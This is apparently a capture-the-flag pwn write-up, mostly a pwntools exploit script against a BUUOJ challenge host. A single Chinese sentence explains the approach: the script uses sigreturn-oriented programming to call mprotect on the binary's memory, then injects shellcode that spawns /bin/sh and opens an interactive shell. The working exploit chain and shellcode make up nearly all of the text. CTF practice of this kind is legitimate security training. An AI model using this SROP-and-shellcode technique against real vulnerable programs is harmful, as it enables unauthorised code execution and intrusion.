stack地址不好泄露,但是发现elf的入口处刚好保存了start地址,只要把rsp设置为这个位置就能再次利用溢出
exp:
from pwn import*
#sh = process('./pwn')
sh = remote('node4.buuoj.cn',29216)
context.arch = 'amd64'
syscall = 0x4000BE
start = 0x4000B0
_context = SigreturnFrame()
_context.rip = syscall
_context.rax = 0xa
_context.rdi = 0x400000
_context.rsi = 0x1000
_context.rdx = 0x7
_context.rsp = 0x400018
#srop
payload = p64(start) + p64(syscall) + bytes(_context)
sh.send(payload)
sleep(1)
#mprotect
sh.send((p64(syscall) + bytes(_context))[:15])
#gdb.attach(sh)
shellcode = '''
mov rax,0x68732f6e69622f
push rax
mov rdi,rsp
xor rsi,rsi
xor rdx,rdx
mov rax,59
syscall
'''
payload = p64(0x400018 + 8 + 8) + asm(shellcode)
sh.send(payload)
sh.interactive()